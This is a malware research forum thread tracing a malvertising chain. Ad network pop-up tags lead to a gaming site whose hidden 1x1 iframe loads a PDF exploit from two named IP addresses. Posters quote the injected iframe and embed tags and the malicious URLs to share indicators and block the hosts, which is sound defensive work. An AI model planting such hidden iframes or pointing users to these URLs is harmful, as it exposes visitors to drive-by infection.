Help - Search - Members - Calendar
Full Version: 85.17.169.57/85.17.166.209
B.I.S.S. Forums > Malware Research Forum > Malware IP Research Section
wagdoll
site name hxxp://gamers-games.com has been carrying malware since at least the 20th December. This site is running in several ad network inventories as "prepopped" ads. The malware is loading via a 1x1 iframe at the bottom of that site and the domains serving the malware in that iframe are actively changing... I searched this forum for the IP addresses that are hosting the malware files, but the closest matches I could find were 85.17.16*

The publishing site URL that is seen in the codes is referrer dependent, if you try to load it in a blank window it will redirect to a cleaner page.

20th December hxxp://gamers-games.com was carrying this:
CODE
<iframe height="1" width="1" src="http://85.17.166.209/css/index.php?sid=2613261e2e162f1d2f1e235022472a4b2c112617221324151e" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium;">


That loaded:

CODE
<embed height="100" width="100" type="application/pdf" src="http://85.17.166.209/css/pdf.php?id=0&sid=2613261e2e162f1d2f1e235022472a4b2c112617221324151e" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium;"/>


Today, coming via a slightly different ad network:

This one shows the ad networks because it's the 2nd time in as many days I've had a malware type problem from antventure...

CODE
<!-- BEGIN STANDARD TAG - prepopped - foloo.net: Run-of-site - DO NOT MODIFY -->

<script src="http://ad.spot200.com/st?ad_type=pop&ad_size=0x0&section=420420&banned_pop_types=23&pop_times=1&pop_frequency=0" type="text/javascript">

<script src="http://ad.yieldmanager.com/imp?Z=0x0&y=23&s=420420&_salt=1123623717&B=10&r=0" type="text/javascript">

<iframe id="rm_frm" height="100%" frameborder="0" width="100%" name="rm_frm" marginheight="0" marginwidth="0" src="http://ad.spot200.com/iframe3?T51aAERqBgCK.RcAxrkHAAIAAAAAAP8AAAAECQIIAANEAAkAQpoJALUlCwAAAAAAAAAAAAAAAAAAAAAA
AAAAAB0LG6-KgeE.HQsbr4qB4T-GEi15PC3tP4YSLXk8Le0.ZmZmZmZm.j9mZmZmZmb-PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVbIVEf4PpAX.cL.L9ceATagfwR56GjWGiR5F
HAAAAAA=,,http://foloo.net/pages/ptp.php?refid=ynot">


That loads:
CODE
<!-- BEGIN STANDARD TAG - prepopped - ROS: Run-of-site - DO NOT MODIFY -->
<script src="http://ad.antventure.com/st?ad_type=pop&ad_size=0x0&section=477339&banned_pop_types=23&pop_times=1&pop_frequency=0" type="text/javascript">
</script>
<script src="http://ad.yieldmanager.com/imp?Z=0x0&y=23&s=477339&_salt=3755613422&B=10&r=0" type="text/javascript">
</script>
<iframe id="rm_frm" height="100%" frameborder="0" width="100%" name="rm_frm" marginheight="0" marginwidth="0" src="http://ad.antventure.com/iframe3? AAAAAJtIBwD8WRgArd8HAAIAWAAAAP8AAAAECQIIAAPwJAsAcpwJANFcCwAAAAAAAAAAAAAAAAAAAAAA
AAAAADMzMzMzM.M. MzMzMzMz8z8zMzMzMzMDQDMzMzMzMwNAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAXoJneBAQpAUaz56Ehmf3V1IwZ45rBUorbL5HTQAAAAA=,,http://www.antventure.com/creatives/default/mke/popad.html">


That loads:
CODE
hxxp://gamers-games.com


That has this iframe at the bottom:
CODE
<iframe height="1" width="1" src="http://85.17.169.57/css/index.php?sid=b181b687b681b182b081bccfbdd8b5d4b38eb988bd8cbb8a84">


That loads:
CODE
http://85.17.169.57/css/pdf.php?id=0&sid=b181b687b681b182b081bccfbdd8b5d4b38eb988bd8cbb8a84
Kimberly
Yeah wagdoll, I'm aware of the problem since december 24. It's coming through Yahoo and splattered everywhere. I did alert them about the issue. Being holidays, most of my contacts are out of office unfortunately.

It's not only a PDF exploit but around 10 different ones.
Moore
Thanks for your help wagdoll.. Added those IP's. smile.gif
Kimberly
There is some more ...
http://www.bluetack.co.uk/forums/index.php...ost&p=90556

ads.bootcampmedia.com is AdJuggler diablo.gif .... which means I know exactly who to contact.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2014 Invision Power Services, Inc.